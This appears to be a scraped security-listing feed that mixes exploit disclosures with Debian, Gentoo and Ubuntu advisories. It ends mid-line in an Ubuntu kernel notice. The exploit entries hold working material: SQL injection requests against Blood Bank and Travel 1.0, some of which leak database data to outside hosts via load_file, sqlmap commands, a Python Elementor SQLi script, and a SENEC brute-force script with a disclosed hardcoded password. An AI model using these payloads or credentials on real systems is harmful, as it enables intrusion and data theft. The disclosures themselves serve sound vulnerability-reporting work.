SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---

CVE-2023-46021: GitHub - ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

**CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'remail' parameter in the receiverReg.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

**Vulnerability Details**

*   CVE ID: CVE-2023-46018
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: /receiverReg.php
*   Parameter Name: remail
*   Attack Type: Local

**Description**

*   The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

**Proof of Concept (PoC) :**

*   Save the POST request of receiverReg.php to a request.txt file.

    ---
    POST /bloodbank/file/receiverReg.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
    Content-Length: 877
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/register.php
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rname"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rbg"
    
    A+
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rcity"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rphone"
    
    05555555555
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="remail"
    
    test@test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rpassword"
    
    test123
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rregister"
    
    Register
    -----------------------------2653697510272605730288393868--
    
    ---
    

*   sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
    
*   current database: bloodbank

CVE-2023-46018: GitHub - ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Debian Linux Security Advisory 5550-1 - Multiple security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in cross-site scripting, SQL injection, an open redirect or command injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5550-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 08, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cactiCVE ID         : CVE-2023-39357 CVE-2023-39359 CVE-2023-39361 CVE-2023-39362                  CVE-2023-39364 CVE-2023-39365 CVE-2023-39513 CVE-2023-39515                  CVE-2023-39516 CVE-2023-39514 CVE-2023-39512 CVE-2023-39510     CVE-2023-39366 Multiple security vulnerabilities have been discovered in Cacti, a webinterface for graphing of monitoring systems, which could result incross-site scripting, SQL injection, an open redirect or command injection. For the oldstable distribution (bullseye), these problems have been fixedin version 1.2.16+ds1-2+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 1.2.24+ds1-1+deb12u1.We recommend that you upgrade your cacti packages.For the detailed security status of cacti please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cactiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVMDYgACgkQEMKTtsN8TjYzmhAAny8lZgRdlKAadeOGxULyDwZMzGhq9zoHUX2otN3nwIuQEotG6m9/Lc3+IQNpase5cNYZZMlF7lA5u34cbHNmnVnraEARUnU1PwsFOjAamv8JWxEfyGEV/V0fSaj7TNBYarHBGGHXhX1uFYQXMyVSTGNWmof7AmvhHol+CqgxSfzhq5i/ue+dtnNAfx1pZ+SzznBJsndUeltEi8CdsIqcdGlldO0UWIj9G0pF2Fs6bvfi9heVKF1D1WaxUzjUZUdmSgzNZ3d6RAjhfA7ButjKdViaKjE93ARfOcl1I5kvR2whqe6RILkx+7NqoQ/JdR1uYbg7wmKPb5+zivmJWk+PBXXlncSTkzuUC9JTx/ypO5x4/op0SD/hz2YHhFonL4Y2tSgQGiAuBqYwWTBjy6NyX+59lKSrbNF2Dt1GdTtR1Dwvzxe8NneEV+kDMwgTEli9D0QDYu8pF6b8OegkK0UJk/gu6w/88xF+E4zTvoFjeXI/Wp9c0sN0zqgyUIWnLyhv5PVYa5TJt1W0RK9QmZyNJ6uLv0xS4LKf28TYU4rI8ilw4/w8lDFE3ox7pUuSa52b2cK5R5I9UXCwIuT+RQZD9QMu8/MFgbmBlI0fXol7Qr7BblK7vEy+HADgXcJQXJxhDcsIfy5YXNj1N1ps3My/FUD/Ui1gCM/4zt9sg9OMiJ4==Exbi-----END PGP SIGNATURE-----

Debian Security Advisory 5550-1

Travel version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: travel-1.0-by-oretnom23 Multiple-SQLi## Author: nu11secur1ty## Date: 11/12/2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-travel-agency-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The search parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'was submitted in the search parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: search (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(selectload_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND'fGlq'='fGlq&searc=&sumbit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 28 columns    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)## Time spent:00:17:00

Travel 1.0 SQL Injection

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability.

    #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi#References#CVE : CVE-2023-0329#E1.Coders Open Burp Suite.In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/    Exploit Python  :The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payloadurl = "http://localhost:8080/wp-admin/admin-ajax.php"data = {    "action": "elementor_ajax_save_builder",    "editor_post_id": "1",    "post_id": "1",    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"} # Send the request to the target URLresponse = requests.post(url, data=data) # Check if the response indicates a successful SQL injectionif "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:    print("SQL Injection successful!")else:    print("SQL Injection failed.")

Elementor Website Builder SQL Injection

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

Ubuntu Security Notice 6468-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. Kelsey Gilbert discovered that Thunderbird did not properly manage certain browser prompts and dialogs due to an insufficient activation-delay. An attacker could potentially exploit this issue to perform clickjacking.

    ==========================================================================Ubuntu Security Notice USN-6468-1November 02, 2023thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-5724, CVE-2023-5728,CVE-2023-5730, CVE-2023-5732)Kelsey Gilbert discovered that Thunderbird did not properly manage certainbrowser prompts and dialogs due to an insufficient activation-delay. Anattacker could potentially exploit this issue to perform clickjacking.(CVE-2023-5721)Shaheen Fazim discovered that Thunderbird did not properly validate the URLsopen by installed WebExtension. An attacker could potentially exploit thisissue to obtain sensitive information. (CVE-2023-5725)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.4.1+build1-0ubuntu0.23.10.1Ubuntu 23.04:  thunderbird                     1:115.4.1+build1-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:115.4.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.4.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6468-1  CVE-2023-5721, CVE-2023-5724, CVE-2023-5725, CVE-2023-5728,  CVE-2023-5730, CVE-2023-5732Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6468-1

Gentoo Linux Security Advisory 202311-1 - A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code execution. Versions greater than or equal to 3.1.30 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GitPython: Code Execution via Crafted Input  
     Date: November 01, 2023  
     Bugs: #884623  
       ID: 202311-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GitPython where crafted input to  
Repo.clone_from can lead to code execution

Background  
==========

GitPython is a Python library used to interact with Git repositories.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-python/GitPython  < 3.1.30      >= 3.1.30

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

An attacker may be able to trigger Remote Code Execution (RCE) due to  
improper user input validation, which makes it possible to inject a  
maliciously crafted remote URL into the clone command. Exploiting this  
vulnerability is possible because the library makes external calls to  
git without sufficient sanitization of input arguments.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GitPython users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/GitPython-3.1.30"

References  
==========

[ 1 ] CVE-2022-24439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24439

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-01

EnBw SENEC Legacy Storage Box versions 1 through 3 appear to suffer from a hardcoded credential vulnerability.

Advisory ID:               Ph0s-2023-003  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-307: Improper Restriction of Excessive 

                           Authentication Attempts  
                           CWE-798: Use of Hard-coded Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39168  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

Based on the previously identified hard-coded username in CVE-2023-39167 and  
CVE-2023-39168 all technical requirements were met to target the password. 

Since the username installateur is quite straightforward in the sense of 

guessable, it was decided to perform a dictonary-type brute force attack. 

For this purpose, all related PDF documents were downloaded to create a password  
list specifically tailored to SENEC.Inverter. 

Source of the Documents: https://senec.com/au/company/downloads

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. parse the documents :  
import argparse  
import glob  
import string  
import fitz

def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):  
    pdf_text = ""  
    for file in glob.glob(f"{pdf_directory}/*.pdf"):  
        pdf = fitz.open(file)  
        for page in pdf:  
            pdf_text += page.get_text()

    pdf_words = set(  
        [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]  
    )  
    senec_password = set(  
        [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]  
    )

    with open("senec-password.txt", mode="w", encoding="utf-8") as fd:  
        fd.write('\n'.join(senec_password))

if __name__ == '__main__':  
    parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")  
    parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,  
                        help="pdf storage location")  
    parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,  
                        help="password prefix")  
    parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,  
                        help="password suffix")  
    args = parser.parse_args()  
    get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)

2. work with the output:  
The Python script extracts all words from all PDF documents and allows to add a prefix  
and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} ,  
such as the following:  
***** cut *******  
Senecmoribundity  
SenecCleaning  
Senecdusts  
Senecclinical  
Senecaggregation  
Senecstubborn  
Senecstorages  
SenecDecommissioning  
SenecInstall  
Senecmany  
***** cut ********

3) use the list within burpsuite  
The password lists were then used in Burp Suite Professional, a tool 

specifically designed for web application security testing, to perform an 

automated brute force attack.  
The list shown above as an excerpt with the prefix Senec and no suffix was 

finally successful in executing the attack.  
It could be determined that the password "SenecInstall" is valid for all  
SENEC.Inverter devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Hardcoded Credentials

Ubuntu Security Notice 6465-1 - Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel contained a null pointer dereference vulnerability in some situations. A local privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6465-1October 31, 2023linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,linux-azure-fde, linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia,linux-oracle, linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1032-gkeop   5.15.0-1032.38   linux-image-5.15.0-1040-nvidia  5.15.0-1040.40   linux-image-5.15.0-1040-nvidia-lowlatency  5.15.0-1040.40   linux-image-5.15.0-1042-ibm     5.15.0-1042.45   linux-image-5.15.0-1046-gcp     5.15.0-1046.54   linux-image-5.15.0-1046-kvm     5.15.0-1046.51   linux-image-5.15.0-1047-oracle  5.15.0-1047.53   linux-image-5.15.0-1049-aws     5.15.0-1049.54   linux-image-5.15.0-1051-azure   5.15.0-1051.59   linux-image-5.15.0-1051-azure-fde  5.15.0-1051.59.1   linux-image-5.15.0-88-generic   5.15.0-88.98   linux-image-5.15.0-88-generic-64k  5.15.0-88.98   linux-image-5.15.0-88-generic-lpae  5.15.0-88.98   linux-image-5.15.0-88-lowlatency  5.15.0-88.98   linux-image-5.15.0-88-lowlatency-64k  5.15.0-88.98   linux-image-aws-lts-22.04       5.15.0.1049.48   linux-image-azure-fde-lts-22.04  5.15.0.1051.59.29   linux-image-azure-lts-22.04     5.15.0.1051.47   linux-image-gcp-lts-22.04       5.15.0.1046.42   linux-image-generic             5.15.0.88.85   linux-image-generic-64k         5.15.0.88.85   linux-image-generic-lpae        5.15.0.88.85   linux-image-gkeop               5.15.0.1032.31   linux-image-gkeop-5.15          5.15.0.1032.31   linux-image-ibm                 5.15.0.1042.38   linux-image-kvm                 5.15.0.1046.42   linux-image-lowlatency          5.15.0.88.90   linux-image-lowlatency-64k      5.15.0.88.90   linux-image-nvidia              5.15.0.1040.40   linux-image-nvidia-lowlatency   5.15.0.1040.40   linux-image-oracle              5.15.0.1047.42   linux-image-oracle-lts-22.04    5.15.0.1047.42   linux-image-virtual             5.15.0.88.85Ubuntu 20.04 LTS:   linux-image-5.15.0-1032-gkeop   5.15.0-1032.38~20.04.1   linux-image-5.15.0-1042-ibm     5.15.0-1042.45~20.04.1   linux-image-5.15.0-1046-gcp     5.15.0-1046.54~20.04.1   linux-image-5.15.0-1047-oracle  5.15.0-1047.53~20.04.1   linux-image-5.15.0-1049-aws     5.15.0-1049.54~20.04.1   linux-image-5.15.0-1051-azure   5.15.0-1051.59~20.04.1   linux-image-5.15.0-1051-azure-fde  5.15.0-1051.59~20.04.1.1   linux-image-5.15.0-88-generic   5.15.0-88.98~20.04.1   linux-image-5.15.0-88-generic-64k  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-generic-lpae  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-lowlatency  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-lowlatency-64k  5.15.0-88.98~20.04.1   linux-image-aws                 5.15.0.1049.54~20.04.37   linux-image-azure               5.15.0.1051.59~20.04.40   linux-image-azure-cvm           5.15.0.1051.59~20.04.40   linux-image-azure-fde           5.15.0.1051.59~20.04.1.29   linux-image-gcp                 5.15.0.1046.54~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.88.98~20.04.46   linux-image-generic-hwe-20.04   5.15.0.88.98~20.04.46   linux-image-generic-lpae-hwe-20.04  5.15.0.88.98~20.04.46   linux-image-gkeop-5.15          5.15.0.1032.38~20.04.28   linux-image-ibm                 5.15.0.1042.45~20.04.14   linux-image-lowlatency-64k-hwe-20.04  5.15.0.88.98~20.04.43   linux-image-lowlatency-hwe-20.04  5.15.0.88.98~20.04.43   linux-image-oem-20.04           5.15.0.88.98~20.04.46   linux-image-oem-20.04b          5.15.0.88.98~20.04.46   linux-image-oem-20.04c          5.15.0.88.98~20.04.46   linux-image-oem-20.04d          5.15.0.88.98~20.04.46   linux-image-oracle              